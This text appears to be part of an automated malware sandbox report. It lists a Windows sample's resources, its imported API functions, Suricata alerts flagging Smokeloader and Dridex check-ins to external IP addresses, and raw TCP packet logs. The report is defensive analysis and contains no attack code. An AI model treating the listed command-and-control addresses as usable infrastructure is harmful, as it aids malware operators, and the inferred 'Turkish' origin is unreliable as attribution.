RT_ICON	0x11dea0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.5223029045643154
RT_ICON	0x120448	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.625234521575985
RT_ICON	0x1214f0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.639344262295082
RT_ICON	0x121e78	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.776595744680851
RT_ICON	0x122358	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.39898720682302774
RT_ICON	0x123200	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5582129963898917
RT_ICON	0x123aa8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6163594470046083
RT_ICON	0x124170	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6408959537572254
RT_ICON	0x1246d8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.44136960600375236
RT_ICON	0x125780	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.43975409836065577
RT_ICON	0x126108	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.4796099290780142
RT_ICON	0x1265d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.39818763326226014
RT_ICON	0x127480	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.4972924187725632
RT_ICON	0x127d28	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.5253456221198156
RT_ICON	0x1283f0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.5491329479768786
RT_ICON	0x128958	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.3487551867219917
RT_ICON	0x12af00	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.37640712945590993
RT_ICON	0x12bfa8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.3971311475409836
RT_ICON	0x12c930	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.4175531914893617
RT_STRING	0x133c78	0x392	data			0.47045951859956237
RT_STRING	0x134010	0x724	data			0.4217724288840263
RT_STRING	0x134738	0x602	data			0.43953185955786733
RT_STRING	0x134d40	0x788	data			0.41804979253112035
RT_STRING	0x1354c8	0x6b4	data			0.43356643356643354
RT_STRING	0x135b80	0x842	data			0.42147587511825924
RT_STRING	0x1363c8	0x72a	data			0.42202835332606325
RT_STRING	0x136af8	0x82e	data			0.41881566380133717
RT_STRING	0x137328	0x6ce	data			0.4305396096440873
RT_STRING	0x1379f8	0x624	data			0.4395674300254453
RT_STRING	0x138020	0x77e	data			0.424400417101147
RT_STRING	0x1387a0	0x642	data			0.4307116104868914
RT_STRING	0x138de8	0x104	data			0.5269230769230769
RT_GROUP_CURSOR	0x1304e8	0x22	data			1.088235294117647
RT_GROUP_CURSOR	0x1313b8	0x14	data			1.25
RT_GROUP_CURSOR	0x133aa8	0x22	data			1.088235294117647
RT_GROUP_ICON	0x12cd98	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x1222e0	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x126570	0x68	data	Turkish	Turkey	0.7115384615384616
RT_VERSION	0x133ad0	0x1a8	data			0.5872641509433962

Imports

DLL	Import
KERNEL32.dll	GetConsoleAliasesLengthW, GetNumaProcessorNode, GetConsoleAliasExesLengthA, WaitForSingleObject, InterlockedCompareExchange, FreeEnvironmentStringsA, GetModuleHandleW, ReadConsoleW, FormatMessageA, SetCommState, GetEnvironmentStrings, GetVolumeInformationA, FatalAppExitW, CopyFileW, GetSystemTimeAdjustment, WriteConsoleOutputA, HeapDestroy, GetFileAttributesA, SetConsoleMode, GetBinaryTypeA, GetStdHandle, SetPriorityClass, GetProcAddress, GetLongPathNameA, BuildCommDCBW, LoadLibraryA, LocalAlloc, MoveFileA, QueryDosDeviceW, CreatePipe, GetModuleFileNameA, GetDefaultCommConfigA, GetModuleHandleA, GetCommTimeouts, FreeEnvironmentStringsW, WriteConsoleOutputAttribute, FindAtomW, CreateFileA, SetStdHandle, GetLastError, GetComputerNameA, HeapFree, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, WriteFile, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, GetConsoleCP, GetConsoleMode, FlushFileBuffers, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetFilePointer, CloseHandle
USER32.dll	GetFocus
ADVAPI32.dll	ObjectPrivilegeAuditAlarmA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-03T02:52:23.786088+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49736	190.219.117.240	80	TCP
2024-10-03T02:52:24.904716+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49737	190.219.117.240	80	TCP
2024-10-03T02:52:26.182658+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49738	190.219.117.240	80	TCP
2024-10-03T02:52:27.283559+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49739	190.219.117.240	80	TCP
2024-10-03T02:52:28.391966+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49740	190.219.117.240	80	TCP
2024-10-03T02:52:30.168698+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49741	190.219.117.240	80	TCP
2024-10-03T02:52:31.286466+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49742	190.219.117.240	80	TCP
2024-10-03T02:52:32.378001+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49743	190.219.117.240	80	TCP
2024-10-03T02:52:33.467881+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49744	190.219.117.240	80	TCP
2024-10-03T02:52:34.595323+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49745	190.219.117.240	80	TCP
2024-10-03T02:52:35.763792+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49746	190.219.117.240	80	TCP
2024-10-03T02:52:36.903395+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49747	190.219.117.240	80	TCP
2024-10-03T02:52:38.030099+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49748	190.219.117.240	80	TCP
2024-10-03T02:52:39.129458+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49749	190.219.117.240	80	TCP
2024-10-03T02:52:41.272613+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49750	190.219.117.240	80	TCP
2024-10-03T02:52:42.384476+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49751	190.219.117.240	80	TCP
2024-10-03T02:52:43.560652+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49752	190.219.117.240	80	TCP
2024-10-03T02:52:44.667910+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49753	190.219.117.240	80	TCP
2024-10-03T02:52:45.777403+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49754	190.219.117.240	80	TCP
2024-10-03T02:52:46.914017+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49755	190.219.117.240	80	TCP
2024-10-03T02:52:48.014248+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49756	190.219.117.240	80	TCP
2024-10-03T02:52:49.132178+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49757	190.219.117.240	80	TCP
2024-10-03T02:52:50.225515+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49758	190.219.117.240	80	TCP
2024-10-03T02:52:51.419382+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49759	190.219.117.240	80	TCP
2024-10-03T02:52:52.746812+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49760	190.219.117.240	80	TCP
2024-10-03T02:52:55.089069+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49763	190.219.117.240	80	TCP
2024-10-03T02:52:56.197435+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49764	190.219.117.240	80	TCP
2024-10-03T02:52:57.297018+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49765	190.219.117.240	80	TCP
2024-10-03T02:52:58.428777+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49766	190.219.117.240	80	TCP
2024-10-03T02:52:59.545775+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49767	190.219.117.240	80	TCP
2024-10-03T02:53:17.311199+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49768	23.145.40.162	443	TCP
2024-10-03T02:53:17.662722+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49768	23.145.40.162	443	TCP
2024-10-03T02:53:17.816351+0200	2829848	ETPRO MALWARE SmokeLoader encrypted module (3)	2	23.145.40.162	443	192.168.2.4	49768	TCP
2024-10-03T02:53:18.822466+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49769	23.145.40.162	443	TCP
2024-10-03T02:53:19.181475+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49769	23.145.40.162	443	TCP
2024-10-03T02:53:19.796874+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49770	23.145.40.162	443	TCP
2024-10-03T02:53:20.075572+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49770	23.145.40.162	443	TCP
2024-10-03T02:53:20.702172+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49771	23.145.40.162	443	TCP
2024-10-03T02:53:20.989913+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49771	23.145.40.162	443	TCP
2024-10-03T02:53:21.627296+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49772	23.145.40.162	443	TCP
2024-10-03T02:53:21.908752+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49772	23.145.40.162	443	TCP
2024-10-03T02:53:22.504515+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49773	23.145.40.162	443	TCP
2024-10-03T02:53:22.783712+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49773	23.145.40.162	443	TCP
2024-10-03T02:53:23.621205+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49774	23.145.40.162	443	TCP
2024-10-03T02:53:23.899735+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49774	23.145.40.162	443	TCP
2024-10-03T02:53:24.505897+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49775	23.145.40.162	443	TCP
2024-10-03T02:53:24.778948+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49775	23.145.40.162	443	TCP
2024-10-03T02:53:25.432551+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49776	23.145.40.162	443	TCP
2024-10-03T02:53:25.666516+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49776	23.145.40.162	443	TCP
2024-10-03T02:53:26.279216+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49777	23.145.40.162	443	TCP
2024-10-03T02:53:26.548436+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49777	23.145.40.162	443	TCP
2024-10-03T02:53:27.149314+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49778	23.145.40.162	443	TCP
2024-10-03T02:53:27.429508+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49778	23.145.40.162	443	TCP
2024-10-03T02:53:28.117408+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49779	23.145.40.162	443	TCP
2024-10-03T02:53:28.411820+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49779	23.145.40.162	443	TCP
2024-10-03T02:53:29.105071+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49780	23.145.40.162	443	TCP
2024-10-03T02:53:29.382194+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49780	23.145.40.162	443	TCP
2024-10-03T02:53:29.986819+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49781	23.145.40.162	443	TCP
2024-10-03T02:53:30.255048+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49781	23.145.40.162	443	TCP
2024-10-03T02:53:31.633961+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49782	23.145.40.162	443	TCP
2024-10-03T02:53:31.913190+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49782	23.145.40.162	443	TCP
2024-10-03T02:53:32.525840+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49783	23.145.40.162	443	TCP
2024-10-03T02:53:32.807619+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49783	23.145.40.162	443	TCP
2024-10-03T02:53:33.464530+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49784	23.145.40.162	443	TCP
2024-10-03T02:53:33.727819+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49784	23.145.40.162	443	TCP
2024-10-03T02:53:37.932180+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49785	23.145.40.162	443	TCP
2024-10-03T02:54:09.019446+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49786	190.219.117.240	80	TCP
2024-10-03T02:54:15.778409+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49787	190.219.117.240	80	TCP
2024-10-03T02:54:24.178713+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49788	190.219.117.240	80	TCP
2024-10-03T02:54:31.831285+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49789	190.219.117.240	80	TCP
2024-10-03T02:54:41.494607+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49790	190.219.117.240	80	TCP
2024-10-03T02:54:53.531734+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49791	23.145.40.162	443	TCP
2024-10-03T02:54:53.771450+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49791	23.145.40.162	443	TCP
2024-10-03T02:54:56.654275+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49792	201.212.52.197	80	TCP
2024-10-03T02:55:09.647073+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49793	23.145.40.162	443	TCP
2024-10-03T02:55:09.932594+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49793	23.145.40.162	443	TCP
2024-10-03T02:55:14.179610+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49794	201.212.52.197	80	TCP
2024-10-03T02:55:27.283552+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49795	23.145.40.162	443	TCP
2024-10-03T02:55:27.953196+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49795	23.145.40.162	443	TCP
2024-10-03T02:55:31.392173+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49796	201.212.52.197	80	TCP
2024-10-03T02:55:44.012872+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49797	23.145.40.162	443	TCP
2024-10-03T02:55:44.353405+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49797	23.145.40.162	443	TCP
2024-10-03T02:55:49.226473+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49798	201.212.52.197	80	TCP
2024-10-03T02:56:00.601332+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49799	23.145.40.162	443	TCP
2024-10-03T02:56:00.871816+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.4	49799	23.145.40.162	443	TCP
2024-10-03T02:56:07.147321+0200	2019082	ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND	1	192.168.2.4	49800	23.145.40.113	443	TCP
2024-10-03T02:56:07.152005+0200	2019082	ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND	1	192.168.2.4	49800	23.145.40.113	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 02:52:22.476536989 CEST	49736	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:22.481908083 CEST	80	49736	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:22.482006073 CEST	49736	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:22.482182026 CEST	49736	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:22.482213974 CEST	49736	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:22.487565994 CEST	80	49736	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:22.489447117 CEST	80	49736	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:23.779000044 CEST	80	49736	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:23.785785913 CEST	80	49736	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:23.786087990 CEST	49736	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:23.786453009 CEST	49736	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:23.788961887 CEST	49737	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:23.791316986 CEST	80	49736	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:23.794239998 CEST	80	49737	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:23.794311047 CEST	49737	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:23.794410944 CEST	49737	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:23.794430017 CEST	49737	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:23.799364090 CEST	80	49737	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:23.799478054 CEST	80	49737	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:24.904617071 CEST	80	49737	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:24.904661894 CEST	80	49737	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:24.904716015 CEST	49737	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:24.964818954 CEST	49737	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:24.970120907 CEST	80	49737	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:24.983676910 CEST	49738	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:24.988768101 CEST	80	49738	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:24.988838911 CEST	49738	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:24.989859104 CEST	49738	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:24.989871025 CEST	49738	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:24.994679928 CEST	80	49738	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:24.994875908 CEST	80	49738	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:26.182543993 CEST	80	49738	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:26.182596922 CEST	80	49738	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:26.182626009 CEST	80	49738	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:26.182657957 CEST	49738	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:26.182682991 CEST	49738	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:26.183301926 CEST	49738	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:26.185656071 CEST	49739	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:26.188066959 CEST	80	49738	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:26.190712929 CEST	80	49739	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:26.191755056 CEST	49739	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:26.191899061 CEST	49739	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:26.191916943 CEST	49739	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:26.197212934 CEST	80	49739	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:26.197254896 CEST	80	49739	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:27.275322914 CEST	80	49739	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:27.283198118 CEST	80	49739	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:27.283559084 CEST	49739	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:27.283559084 CEST	49739	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:27.285726070 CEST	49740	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:27.288734913 CEST	80	49739	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:27.290668964 CEST	80	49740	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:27.290759087 CEST	49740	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:27.290863037 CEST	49740	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:27.290905952 CEST	49740	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:27.295705080 CEST	80	49740	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:27.295906067 CEST	80	49740	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:28.385185003 CEST	80	49740	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:28.391896009 CEST	80	49740	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:28.391966105 CEST	49740	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:28.392056942 CEST	49740	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:28.394406080 CEST	49741	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:28.396989107 CEST	80	49740	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:28.399358988 CEST	80	49741	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:28.399492025 CEST	49741	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:28.399614096 CEST	49741	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:28.399646044 CEST	49741	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:28.404433966 CEST	80	49741	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:28.404683113 CEST	80	49741	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:30.168534994 CEST	80	49741	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:30.168579102 CEST	80	49741	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:30.168607950 CEST	80	49741	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:30.168641090 CEST	80	49741	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:30.168668985 CEST	80	49741	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:30.168698072 CEST	49741	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:30.168698072 CEST	49741	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:30.168786049 CEST	49741	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:30.168818951 CEST	49741	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:30.171230078 CEST	49742	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:30.174027920 CEST	80	49741	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:30.176224947 CEST	80	49742	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:30.176306009 CEST	49742	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:30.176407099 CEST	49742	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:30.176431894 CEST	49742	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:30.181489944 CEST	80	49742	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:30.181576014 CEST	80	49742	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:31.280688047 CEST	80	49742	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:31.286276102 CEST	80	49742	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:31.286465883 CEST	49742	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:31.286550999 CEST	49742	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:31.288522005 CEST	49743	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:31.292118073 CEST	80	49742	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:31.293534994 CEST	80	49743	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:31.293620110 CEST	49743	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:31.293728113 CEST	49743	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:31.293762922 CEST	49743	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:31.298780918 CEST	80	49743	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:31.298823118 CEST	80	49743	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:32.371716976 CEST	80	49743	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:32.377830982 CEST	80	49743	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:32.378000975 CEST	49743	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:32.378000975 CEST	49743	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:32.380131006 CEST	49744	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:32.382977009 CEST	80	49743	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:32.385065079 CEST	80	49744	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:32.385147095 CEST	49744	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:32.385245085 CEST	49744	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:32.385245085 CEST	49744	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:32.390137911 CEST	80	49744	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:32.390166044 CEST	80	49744	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:33.463484049 CEST	80	49744	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:33.467801094 CEST	80	49744	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:33.467880964 CEST	49744	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:33.467971087 CEST	49744	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:33.470546961 CEST	49745	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:33.473594904 CEST	80	49744	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:33.475785017 CEST	80	49745	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:33.475944996 CEST	49745	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:33.475970984 CEST	49745	80	192.168.2.4	190.219.117.240
